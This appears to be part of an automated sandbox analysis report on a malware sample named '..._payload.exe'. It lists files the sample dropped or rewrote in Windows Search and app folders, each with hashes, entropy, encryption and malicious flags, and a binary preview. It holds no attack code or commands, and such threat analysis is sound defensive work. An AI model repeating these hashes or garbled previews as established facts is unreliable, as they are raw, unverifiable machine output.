                                                                                                                          Preview:[{"Syp....'..p...H3a#.,....|...t.....J...8...(tP........G.....G..6......\.5$@........U.w/'..Z..i(._(.:..yI...xm....D.....c#-...%......[....K&.:..X...5.Uf|.<...d.:..v..?G.Kz@....N....`S(.;c....`&.b..z6......%K!y.*Rk.(v.n.. .1....l>.+Uq.5e.=....ef....:Z.}..g:........2C.>w. .l.J....{.9.@.......|{m,....ro.hM.q.V...S^......+.~.m...... ....-......r.'.@; .z..%R...s.....}q.%..V.2......9 &.o....R..ef.{&..KWvPt.....F.@...w....<....n.DK..6.~'.S.....r`O.....9j.-).0....5..dw^i~.H.W):.P..4,.I......7n..0.~......q8G.@..K...M{. [.%...".T..E.Y....}.Fy..........|U.....S.e.1..wE.w..x..uJ8.oC...)l...h.k..Gr}4..!.eT....*mpOn..Lt...Z.c......_.qcF,K......t...$....Ne.&....?N.:.E..3`A.h .2U. .. ....T..._...u..8...A.g)...O.w@s.Y....H....R.s...Mi.[@.yX.T...m...xhS..*#...}.~7..ig.6..e.p.k3.ay..^F+.....df......k......Q.L.+.s8._...X.c..............Q.+....:u.K."L.m....&n.i/.....yy...4.>....x..4....(i.M..y.z8..._.}...B.P....S.Ix.....@F....'..4U..]C..E..U..s...55....@

                                                                                                                          C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\DeviceSearchCache\AppCache133408904996229952.txt

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):118527
                                                                                                                          Entropy (8bit):7.998317920793235
                                                                                                                          Encrypted:true
                                                                                                                          SSDEEP:3072:K1SWDhleh3qfiapgPcAyxQWbi1r0wo+BB0XDs+K8:K1hlXqap42aToLD
                                                                                                                          MD5:C5791C517F1413B4A0A534C4DC2F6D5D
                                                                                                                          SHA1:36F61587688F68A315E2D60C0A5BDEE44EE8C8F4
                                                                                                                          SHA-256:4BAC51D40BF0BE9A351ED733FD8819B8FDC60A7430603104ABC04668DCCFD6DE
                                                                                                                          SHA-512:5D66AF31E2D85992822FC09B7710BA04EA7F27873A2FE1FD7F3D327AC399D969F0E45B3F21AC50391EA0C1D47B5D0670A82CE2A45988143FDBF7E4B589315210
                                                                                                                          Malicious:true
                                                                                                                          Preview:[{"Syj....$.V...*8....>x.WO.A.........d.....b.~...HC.......5..iq.........[gR`C.,...ew.`+...c.Q9.P..l5.E...{Zl}.`.......%r.<.R.T.".g.<....kL....+...)..2..A.(...3E.G..z|F;[t.l0.oq'e.U..l+......:..?-..%...B+.'..f..P...kZd..w./WP.k....i1..?F.3io.....x...cGo9.n&Yby6..+T.n....J.....yc....t!]....8'.!m.a%..]....N7.Z4.".:u[v.oON..y.]...L#..-...P.\2S....)5.."xH].f.yy.G/|'....)Q.ft..m.a...B..7.?.....V..Q.....Z.=E.T...4....J.:R.8.O...s.....6Z..?x..&7.Ps0Q.......C....?I.Q.KM.|Y=.......L#.Z!W...A.S..P..E5u?V.....w.)..s.5%...b.........x...%..L..$....p...t.-..... *.G.D#...3e..{.s....@.b.w}..x ..d.\."...-jR.......r.8...+Q.1T.`..'y..w......qy);..x\gAc/..k8.....~C86O<wK..8p+....l...P.....X#.n.r,.N;..L...[..........(5H0.....T.yJ%i....a....A....E.#S6..B.>._k.:.2`.TJ&g.Kw..c...-+.<......|.A...W.=t...v/.<.`..F...Q.'..!..g.C.>.E...G?...*..gb~E...Z.......[.c...q...1.B.....m..D.9....=..]..B...@F.Q..lZ...w.._..t(.....v_..X.f.4"_.fg.$...T>... %.Kn..b..I

                                                                                                                          C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\DeviceSearchCache\AppCache133408906321630689.txt

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):118527
                                                                                                                          Entropy (8bit):7.99829234846039
                                                                                                                          Encrypted:true
                                                                                                                          SSDEEP:3072:ZsGlBBb4HFD6F4ELiHbM3HbPdFvXEdWPdyC+5cGcQzraA:1zM0iXGHXEd0dyC+yQfaA
                                                                                                                          MD5:1BEB206BF5987A3A3042BB79E1B7E251
                                                                                                                          SHA1:234DC5F20FA3FF96F3E09AF6DBE599FB2CF1C008
                                                                                                                          SHA-256:26875625061E4297A37F5812DDFAFBBF81B782511618FD64B10635354EAF4906
                                                                                                                          SHA-512:A6DCBC602CA541A2EE71A61C4E99C3C44E78DCF73973906C51469A57D3CBA6BD76F896023B71789F1140C807FC5E22E35D18C0BA5F38C80B6385AD963840F53E
                                                                                                                          Malicious:true
                                                                                                                          Preview:[{"Syk..JQ.~M...F.i9....`".p.^.j..iq.....H6.s....\z.,U..X..[...5,....).H.D.4GQn.:.|..tB.....m..0.9k.....#/.)...qnR..X.x.S.W.....~jcX......c..7....s.\2.I...&.f4*....tg.).p...A{>N..(n.7.Nf.....//..:...9...h-.O.e..&...f!..-...1n.@fu......Oi..R..K{.."..%...I.#.NX..".Q.zq..*|.C...A"=~....A.*.YR.7..&....V._.V2r.B.3/..%B..m&.!z...?.......`..mV.?(.ORl.Qeh:...?l..K....gBAG\'^|......4.#.....gh.G...4...E.{d...0d..#.iH.......cn)....[...o>..Mq?. ..[...L...L...,..V}...j{mQ..X4.b..J8x..F......u#@-tIh.*-..#...g nu..Z..H2.$.'......@.._...A|D.z.}.Cl.+.M...L."....o.....n_ ....U.X..Tq.....=....3............W........[Q..r..nur...........}..F...}...<7,.".<....v..@@.>.~.=..h.wT..p.. nL={.x6U..e..,.8.S|.n.c......S.a....Pt.qk.T.)a.E..u...*...<[.m........=rkp..R........!>.'os......f..9........Ls(..CY.....X....../.a.l..D:.X3..B....4.o.V...8..X<.&.{..v.?,..v[5hRQ.C..?Gx".S!/u.0....@....)..z..Kf.;.w.Vdr,..Q.*Rd...S.G..({.x.D.!...5`....G+d...g7l.n*.d.W.,....g]._....%..9

                                                                                                                          C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\DeviceSearchCache\AppCache133408906620712704.txt

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):118527
                                                                                                                          Entropy (8bit):7.998380960583307
                                                                                                                          Encrypted:true
                                                                                                                          SSDEEP:3072:8rXQvWsF14p53Stb81bS54skbWc0lr3zZvQbEdHC:WKWY3on2lHpQodC
                                                                                                                          MD5:1D2B5267EB6CA2FE056F8681C3108B52
                                                                                                                          SHA1:D7765EB620B4129AD547EF58EE7EE4AD5A007CA5
                                                                                                                          SHA-256:56D031EC2DFEAC6FFD0CEDC40B2FBC1B85CF4D9617EA0FD640FE25E14D70163B
                                                                                                                          SHA-512:E6D5C607114CAF09C27486DC5B9C713C2FE7E9BBD2A09C90DADDE28063A8FA1A7DA2E9BFD8740E1863BD69A5EBCEC641BFC7D96D87265586B30009E06775FD9C
                                                                                                                          Malicious:true
                                                                                                                          Preview:[{"Sy4....a..I..\/@.W....bz.$.5..K.O...._.6<.h6.....Z..CJ-Kn.,l..ml}ti..&F*....Ir."B..+_:.T..{...~.".{*p...=..._._S.#.jw..g..d.{...u;.jSC#...)...J...B(.mK.6.#].r.|>..4.....t...dn.z....{.*.#...'A..{[...D...=.M.-d.l....9&...jS......f~.....p.x........-9.-....GQR......E..t...s*.....;.Y.o..;.~..@gmA.Un..]tk..j..S~.@8...-.t5..v2..........T.A.......I.&_..+[..VX.......eO^95..Y.pv.P}...B.N3.eN.n.....C.a..c........r....}..N..U...d...T..OC..S...A....T....`_ac.S;....Z_..O.W.^..QP..8p..t3..z`.)."I...%.4.M0kp...`.|T.:..].O.&....k..v......+ ......cJ.....a....E....2......-...c. .].0......t.Ty..A;.+.?...:....R...Ib'.|'......^.w=..a.......~..../......G..H.@..W\.~]..<4.H.XE....[..x."......T...L.J.+L...h...4...#.....s...tw......X...I..>f..zP.u.~.(-R.[H3.....e#A...:..e.D:.".D......_...@.0....D>.#..*c'...Mx......3 .D{.):...y...}?.........Y..K..m=. .<..F....}.......R)..=zL6..NO...-.?e......d..."...z.._O.....Ii&..U....E...@............=,h..........vu...

                                                                                                                          C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\DeviceSearchCache\AppCache133408907975188232.txt

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):117246
                                                                                                                          Entropy (8bit):7.998441039157461
                                                                                                                          Encrypted:true
                                                                                                                          SSDEEP:3072:gyiHhuNfvRc+c+4Gt2Yte72mFbJhdSSEn4obf1tXf9RCnGOGsEVcJuU:liHhu/xcvy2kKtFb/E4o5pf9Nrssc0U
                                                                                                                          MD5:595D801B8E6229663B744510D4510118
                                                                                                                          SHA1:9AD72244DBE9D6E98BE997B00903D999AABAF3DD
                                                                                                                          SHA-256:028724B85D413916AE5E59E07E39A34A44D999AE703D0849CF87FE13444C7CF9
                                                                                                                          SHA-512:BA4F36561C2DCAB0DFE2EA613EAEA3C5C5AC1E4C97AC1C8777D7CE67054276317B45CD8DFE5C2B5EB6F16160DAC0D076738A1C1B9E2637D7ECC09D74784666BB
                                                                                                                          Malicious:true
                                                                                                                          Preview:[{"Sy.eb..(...`NFF.;...O..eB*...!.3&.C.1.H..u..H...rtUL}_...6.....@.........z.....lj.....y<..n.....'..O.V........=.5.Ks...~.T..8....b|...i...c..pR.b...B...W..b.e...u.~.|.^..mLi...v..C....,!...0../.3o..4zo.|.e........J.h.e....................A|.c...~....P.)......Z........Z.....[._.5a......<.....c....?.b.|I}..KDa....X..q.g.F...\.9b..2G..E90KQ..X..j.4i...=.,.G.....+....._;..9..q.._....q.....x.&S..D.}...7.I[...m^c.fP..*..N.0.d...:..L...#.<.g^0x.....'D.2.d.zq]9fp..4e.I8.\F./..7m.......z...i30:..Q.2*;@.r#..k.X$......W..h...T....*.QS....L....F."...(.J....i....>.Yn.....<..SI..$.pa.....%.....L..Zx...Kc..=..'...qF...p`f^.>Q..K.....E..-.eM..xL.5.`..'...P.K.J{.+k@..Nh..&t!..,.]e{.{(\........$0..J..Y../.....*..i...f\Q.W.,:>%Vl._R'p1..J.......X2...Y..."UB57.M.m.....o&.Q....q;m3.'.N.4.f......=.f.......:.fhP+.&..r.FH-.2../1.f:...2.Wpl...O.....".NX..P .n..\m%...Q..(..D,....q.......2...lH.Y..0...;....]Y.^..].x......T.Qm.\.S|......N...F..{l<WK]..G.'.`.Rk..

                                                                                                                          C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\DeviceSearchCache\AppCache133408908224609935.txt

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):116817
                                                                                                                          Entropy (8bit):7.998394461751304
                                                                                                                          Encrypted:true
                                                                                                                          SSDEEP:3072:P75NzmzZBkY0xyUCfIVnaXmt5IUR6w3/ScBI/yZBBvQEHxhrf:PFNyzZBkhxyUCf9XeOOAWvzTrf
                                                                                                                          MD5:552E5E697432D0DE1BEE9C2DC0B62A7E
                                                                                                                          SHA1:0C3AE161CA353C8407C3D4EBF190F78FA51E3AA8
                                                                                                                          SHA-256:3E91150B53DD30F21EE9945CB527F6C04D02AC7B652E7510FA44115E3A6A78DE
                                                                                                                          SHA-512:D8D121870D3985B652066D001C532341EAE870686A8895EC75B111F7FDD7A5FAD857C077CB828FFE8D7FFB5DA217045E25F485E8922E2EA919EE4D0B777E30AA
                                                                                                                          Malicious:true
                                                                                                                          Preview:[{"Sy....r.A..F.-.1...it+O.?..R...Z$p..L.....H^.....-.....q...'...!.u../...d<..... 5....M.*.?.>C).A@.VY.Q......,...;@..(Rs.........^1.O...R.4.&{....*..O{x...z.J&...@.<.m..1....ov.w/..w;".f(R...(.....r...pf..?...70..W..,..N....6..e.qFp.K.P.0c.Ux.@....3...}. jX.e...J ...*F....|.;..y.."?:M........&..K......aZ.kQ......G..........WMF.....1....R.9...~...9/..}..a............I.O.j...s<..Cv.....?..7..[n...5...]....]W..D%|{JP....KK'.u....byR...l.gW{..m.O...(.;. ...7...A,U.>.f.r.....Z.....C9.??...4.!.....T.......D......s..OQ;..D..2......`....so..,....U.4...L.Zh...<...rl;*.Nm.&....n%Wp]...3.....)I...9}.}....n.X.....y.f0.........N(.....~K..%$x.....zW...^...............).9-...E......6.A..7+..h....{C.).}....._v%..J*.......~8IC....'...=........B.S3.Pa..sl....zY........a....M:(...W~+.N.5....9.;.._.5...a.p.6.;.vT:.T..8...|'I.D1.IqL..{.I....f...M..H.OA.....v......P.pN....cEj..)....4.....S./D.F....FQ..&.Uy..*.....r.+..7...l.jG/X.a.....*..>@.z.B|h'T

                                                                                                                          C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\DeviceSearchCache\AppCache133408945549071925.txt

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):115275
                                                                                                                          Entropy (8bit):7.997867354859463
                                                                                                                          Encrypted:true
                                                                                                                          SSDEEP:3072:/0h/pi1BCclwBI8BG4Bbvi69enxvWPuBjURp7bF:sLE1lQ84d0v9jGF
                                                                                                                          MD5:41A9E0C86A7BE4A0B2174B1B84804896
                                                                                                                          SHA1:F086E46C7FD6ADA05997233677B0F06791E6040F
                                                                                                                          SHA-256:318159728B043CEE23CB89CA9AD5E70E4DBE5AA8BA2A8831D8800667FDBA70E0
                                                                                                                          SHA-512:980E617A7D9920925D95AA5D6BCB7E2FE2D54399E10D6E43BFE14CCE3CE21AA5EEB3C6C190359FDEBAEA283B973BB39C6C8C13B6EDE0D8FAB818F1006EE27570
                                                                                                                          Malicious:true
                                                                                                                          Preview:[{"Sy../.C.U..._6k.B....<._..z.0..j..>...S.|...7].6......v....Q.g.!.|o.=.......Z....;I.mU..&^.GPga.7..$`XL7Q.tK#..l.....UL)....n..6[x.'4j....Y)..Y.....*....@'..U<.....;3.*".g....k.LM.!..\.i..r..4A..A@3..qy.S..T,J.c...BZ.@.G..\.: ..;....c.......e...!!.#fh..z@g....dE..Z)3....F.r......9ix...|.6.{....2....>.6...)...vc...E..h....Y...H..F-......<.3.......|8.p.....0.t..2.....X.yc/.."X...C..5.....&.4.PF.~]yg..p......O.n.r...?.}. h....*]x.B6.....z..;)..@..+v.......!.*..c.#.:..{..2...'....^.t.+.^.z:va...SD.D.Z".A...\w....U.D......r.P..z.....c.i....5V......v.S...o.7.....Y.)...i....;. .;.I5.M:Jb...e9..O.~X....,[h...-X...gQ%.+.........lk.N~.9.(:R..89....o..0.U..\M.....%qN...*.C^Gm0I....Q$9..A{..X....@.}9..\.X.L..bEU.5..qi.e.^d..,![V1..<c.{E.j.R...#..dtI.4%.....W.T...5..A`..2t.fK...T.b.C.$.s@ <^%.#.V...K Z..c....>..].7.i...l}|7..$@..<d..L>.qB.g..O..yhZ..t[..-...,...YL............0D<.H3.E..c.....G.pg...g..F.#.S\.j../...M*..~.}.9.7.u!.2_.,.C..4T'....W.

                                                                                                                          C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\DeviceSearchCache\AppCache133498356744920266.txt

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):115275
                                                                                                                          Entropy (8bit):7.998523039165762
                                                                                                                          Encrypted:true
                                                                                                                          SSDEEP:3072:QJJlOJK0qQtGQZVPiwOPgAe3QIFYD3cWVhXN2yS1:WJl+KZQ0QZVPwPgAe3QIk7nS1
                                                                                                                          MD5:587725F9652BE6314F05CFFF33D19FD7
                                                                                                                          SHA1:4459C719A9F2C8EA6B2A0AE9906EFA4038227309
                                                                                                                          SHA-256:2E7BA5179F368894B7E7D5904D3456220FFD6B8F9EDBCE502B947AD972F1369D
                                                                                                                          SHA-512:0032D8F38E347727849F26C677694F48A1B129F742141BACF7687A443ED81802AD26C3A67462478DF026D1CD61C7750780133FA97E72B65C53B760A103704B8F
                                                                                                                          Malicious:true
                                                                                                                          Preview:[{"Sy...%.U^F...x..`.(G..o.F..Q..{..0h...!...2.c..{......:....A..\g...?.r6#.F|.{.]=.O/!.\Qb........x..A...5..s6>p.\T...0I+8.]1.@..^....../....".#......yD=..a..e(.....N.......p|........h.9Tt(.s0..nl.G%}4.c>p.(Bo...TH>.-.)...9.w...9y........w*.....Ao...h...1$#.B^d8R.S..j,.A..r9....:...c.E .o..|?.....V..~.$...e.....i...(Y.<...y....z.&.m..........#.t.V....8.7Z.W..M.3...mg...9s.I;J[.O.>:.H.ei..=...-..l.k.N..w..<.>.{.)....%......jiT.C]..N...PL....J.....#...(.~....7............!z.EX......~;.... ..pP..q.8C........c.Y..*......c.sF...>.g...j....v......aH.W..$ZT.l.......D....tp..|..>&.9T.......=.8^......../.4.5.v.w..'{.b.Jw........K....K.{...f.m.....,.U..^..H.ua.."..$.j9.].3L.kF..K.X8..FZ...c?OWeo...."...~..~....1.#..2..c.RD.n`..-{.WJ.yf.+P....".9..q#..7.@...>....TFO.....t..... &.._...?.;.[XFS....$ .O.(!..x@.`...20./..'....@.&.m.L.$.bL..f5I.gi.......o.Zv@'k,Q.W.Y+.*...2...i...L...v.[QR..0.H.y.@....GVx.......~..^p.m....G.$..J...2'......ff..~3d+..

                                                                                                                          C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\DeviceSearchCache\SettingsCache.txt

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):696930
                                                                                                                          Entropy (8bit):6.210285297128402
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:6144:Baskpd8mOfCkaYsiDKLJTKiAHv5vWotdxls+FkuMOCc5MpzgroTDL77KecgiTJQ:BOrKCmQoGotdYuMOCc5MpzgroTDLgQ
                                                                                                                          MD5:471E2E19AAF3336910D2B0E6F9489258
                                                                                                                          SHA1:8EEF0774AC5D51B3185A70D32267B140B41DACB9
                                                                                                                          SHA-256:6757BB595B9FE56C9A0CBED5704FEB978EEDAD144FCE4747F2D61BC6602C1449
                                                                                                                          SHA-512:ED21A6D733FC97033400897A077DCAFAD5F9CB7D101D85F3F472938F41A27E8FD1E7D98D901D490D542DD160C0469D2C04BCA21C371093C3AD2EA78F76476598
                                                                                                                          Malicious:true
                                                                                                                          Preview:[{"Sy/D.....).0-....Zy.?>LZ.nAs$..............Yb7DSo...F...=G].. .K.l1.T.,....A.g~..&.l}..P../s"8>G.5!....s=@...t..Th.9........,...w3....M.3.O.f#.8.h...........)6..1.tS..@+ ....EO.._M..W.a..}m........v..f.O.O~.`.E..g...J...<.E,.._.u.....G.......QT.+@4...v.|..0l<+.|...O.tvO.K.&_._F,..-...U...i..U/r..w(<.....P.T......9.J.,...?,D....K..^].c.Z...w4 .2..MF._......T..J("..U.....as..#.(.R...I..p..<.F.-Q..".<2.X......r.q.....).Pi%...'..>.Kr.4]...*...m......r.Q..nb..3''.......2..,..p.Fb#.f.M....hS....P...,.o1..bH....d2+..?......j&k.LI1.8.....f..O.:1."............W......N...<....Yd....v@z..E|...p.?@"=...."X.R.s.%!........ ...R.Y....fx..$..%.../H7s.!.j.K...'..N.Rj...d(."...pzQ^.*...D......f..9.X...P4T<.!@.....a.U{...../.Ow..H...[....S.RM.3......c.T..<..O.ZA.....9~.{.u..*.....L...+..y.....o_.}.\/.=......... .Og.pJ...\...z..<M....f...|..<Z\3j.....DM.=~..Q...I;&"....4R$.[PL..F..!..~VR..V.~........RR....57w...T...sEO..p.O...L...m.....P.._R...N...

                                                                                                                          C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\ShellFeeds\GLEAM-DARK.svg

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
                                                                                                                          File Type:SVG Scalable Vector Graphics image
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):7458
                                                                                                                          Entropy (8bit):7.9724890233728045
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:192:I4+3zwKOnRrRY2c5hzYLWBYj5JQnvTlF8Fdh:Iz3zwnRV5c7YOZmdh
                                                                                                                          MD5:12A988F28B343234501B437F34DCAA5A
                                                                                                                          SHA1:D44BEE60D4D39FF5E79134854082286AD4FC0289
                                                                                                                          SHA-256:2D6D352D6C6D8F9605659721A1D64CB4BF6A7D3511985D53AC14EEF00F48CB71
                                                                                                                          SHA-512:B7357A068A8F4F0D5B11C2817E78139714C2DC44E68498E3F22D144121D3526452E2F6D17EF80B29E5D52F7A1ADC127D8D9FA8F2EBF1912F3CB992308B2AD422
                                                                                                                          Malicious:false
                                                                                                                          Preview:<svg .N`.......x.|......!..$+H(L7B....".x.q.U...........@'...+.0...]..p.&......o..+.qJ.""c.X...q..N<.#...Q.....H.......Ua.p.{...=............:@m.........>L1...E..no....nPWp.f+^.....s.p..umt......:.>.k.>..%....}7i..m.v<^.?.=h.O.".b..Bfl....,..p..o.bX.8..o.L.@./".W.M.'..=......q...{..w.x....gb..N.%.._.....1ix..TM.x..|..m.||...N..8...p%..%".R*2.n.D......E.OB.9.H.?.e....DyU.;.Fr...Pg.r.......@D.....P..q..... .Q....`V..$...o.V.Y..!]Dwu.oe...X..K.@.bW....[!....>n..yq6..q.?@+..V"..qq..>.m+.?.+..`..|.*5v}.$?....z.N..{#...JR.."..:..l.<....."...E......3t.f.[.*3}+.C..-...."..NU..|fK5.a.:?..V..8...@|......6zB5..R0q..H.k....A...=o:#.-..+....eG...9K...X.iU...+.v....qt..f...[D..%.tc.C.6..A.....a.....&{.=......nh...D..0..I.vw>.@......F..O>.!...v.^J...}...3....T..A......Zc6.>...z.b.O.t...J..^._.3h.#n....A.......Q\.....vTH..<..!.C'....D!....H7i.E......s.T.q.W...2.l+.M.J.....a......P#.h....onY.h.68.3...:..$I.......d8t|..j...7..>\..C]W^.=e^*.-...V.0eM

                                                                                                                          C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\ShellFeeds\GLEAM-LIGHT.svg

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
                                                                                                                          File Type:SVG Scalable Vector Graphics image
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):6854
                                                                                                                          Entropy (8bit):7.973131001989354
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:192:uM5QEidy2VnZ7HdKyRcCrMZOJkbm18hYLfxR:TKldyMVgBCIa5X
                                                                                                                          MD5:0CC3F06EA0E53E92C021B7211F601A82
                                                                                                                          SHA1:7E8511402BA1375ABEFB5E2E0EC6AC6BD90654BD
                                                                                                                          SHA-256:650F49A41A5B2A93E50F51F03FB9959842C7DF0F8BF42A394BFC39F4AF1A69B9
                                                                                                                          SHA-512:8A5248787DFBB7B1C9945FB52EF1E8EEFC5A3326D335FC98CAD8C099F043453B5882B224A48381F51D60FA909D1AB6B7E4C2E4D2493C4302D239E7001E994A13
                                                                                                                          Malicious:false
                                                                                                                          Preview:<svg -..I=ZS.....x.....z.....U..e.aZ...\....j..z....Ue.f.{.G...a.h.B.Y..C..M.!3_.!U.....-%{.`.Y16........q.<JO.u......Xk.1..l....N..n.AD...4.xh.L|yF.b.8.z..?k.$.U.G...m(............n...J..G../.,%H...(..4...Wgj..=0...8Dx....+n...:... ))l...?wQ.............6%...>...D...c.r..%.R.....|Nk.VMi..m`c<Y.~n.^.Jt....M..Z25....W...'.T........L....v...,n.Y.w@aU.....7N.l([...i...i?.j_..P..+..@..v.0.\..........l.Q6.,..aS.]...N#i..'......K.`Y.Yy..F}d.u]@.0L...S....|Q..............pYD!.A.r..K.?......?......~,w..5Ky.@......W{...9..;..LGC.......F.....W=N.C.[...O.).J.(.V...h....;..p>.G.....3#..ju.)<.S..bqO.....)\.*..mg.oQ.@PE s.....n.0...&.h.jp.....R.z....H..Z.g.h.AKf...:=.....aT.C}R..Q..7h,}..._.(#E....t-......U....r....L.8..}.1..+.9..SH.....Y..3B...M..[..f....^.L.!j..n.....i3..VI3Z..IRGb....B..e..1..L..\.(.'..>0v...In..5H..}.{.E.O{..~26V..m.0{3.9V...Ic...(.~=q..G,...RTdE=.$4|>.h..k.\D._De..>&...c...eA..d,x..f=.?2.%_\p.>...a.k.N..p.T]...P...,..Ae:.$~k.;.......I

                                                                                                                          C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\ShellFeeds\IDX_CONTENT_TASKBARHEADLINES.json

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):149024
                                                                                                                          Entropy (8bit):7.998658895793933
                                                                                                                          Encrypted:true
                                                                                                                          SSDEEP:3072:ivYwol9beGMVzMfPCqbmUpKO8LjW6Q6eE6SqJnY62yMGDILVEatDbFoM0:ihCbeGR5bHsrPWHEPg2yMbGiFoM0
                                                                                                                          MD5:50F45B9A5EB9C5657257D00B8E8FC9C9
                                                                                                                          SHA1:68B4A8D00C4057296E24EABBE0D7488B875CC461
                                                                                                                          SHA-256:322F5BF29B2F6BBD85B140A8C4184248B329989831D97931D154859FD1C92277
                                                                                                                          SHA-512:7FF2C8A66C34613E6A1D3B1B9E36323079BD3E003C211A833BE0D207477E1B3ED02CADCE7F499ABD212B519F430AD11CDA47E946D4446097DCF3A42C4E192EB0
                                                                                                                          Malicious:true
                                                                                                                          Preview:{"loc....).X.s....1v.n..=..g@(...3.!.wv3.W#i[.4.......*nX ..9....n|s.|.q<.k..}R...J...uzS..De.G-.1e....!z.}.uJHh.1.3g=.76-...6....X...l>U.T..ns...;(...Ir+,..G....y;......~!...G.x..np.nsQ...`^..1o...f_.{5k.l..9.2...Y..Ls?.cXG.e.h.....>.,".).C.. .....l6F..*..5..v..:.\...V...i.i4./...o.(X,k.8..e..R~o1.v.wa.:8....0...&x|G.....<.J.....!2..Y..b...`.3E.B..B-a.`...r%....+.Y....LRr.m\.......J..S...cf.....@..Y#.D.,..[.....KIl..V...G....@.A..R>.J....F=.9....e..#.....B x.a..^(...G....'ef.H..*...8.}.}}.0J..*..s...[....W0M.Y#r%.l.YUM=...'....`_=$.|}h..1T.{....LW.......K...@......sj...{...;s/-e....0t..(..~[...R.=...>...[9a.Hi.):..N..g.9.8'..G,.+.w:....5..#.a....Nj.l.<..0...*...PI...dtI}.".6~.+RiN.j...@.0K..vJ{..Y....../._.c5t...E.Q..a?HS.....A.5......Y....p..n..X..L7..b.a.S.M.>E......L..:B.....s.g99$..-e|.\.*....l.P.Q.D].".Ap..N.X..n.*FQ .E):0y..g..<....U$..WS.O....O58;g....^....~...].p.~.t..\"J.B+.4...D.)...d.%._.\@...Bq..@.9V..H*..xt.|..)W....8..GR.Mz..4..

                                                                                                                          C:\Users\user\AppData\Local\Packages\Microsoft.WindowsAlarms_8wekyb3d8bbwe\Settings\settings.dat

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
                                                                                                                          File Type:MS Windows registry file, NT/2000 or above
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):8526
                                                                                                                          Entropy (8bit):7.978087494993757
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:192:LQ0DfKj/IjtKAzs87CGNn8bQDWcHXJtrUPohzpbd012:LfDfUQzsIVxac3XAPuzRr
                                                                                                                          MD5:5408423788F0F0597485937C572BAAA6
                                                                                                                          SHA1:4516309513F865466B611FB487B2AC7E0D81FE56
                                                                                                                          SHA-256:9591942E713C6AA9E002CDDB2157B82ACC7914079B2F254D36CB56418EC952A4
                                                                                                                          SHA-512:18531094C572480E88EB7F47983AF7A5F97FEBC77A4F96650F586E79A3580416D42E673F65A33D11C7D1B2E5BBDBC4B3EAE79E13F7882272816D7B4F9F14B121
                                                                                                                          Malicious:false
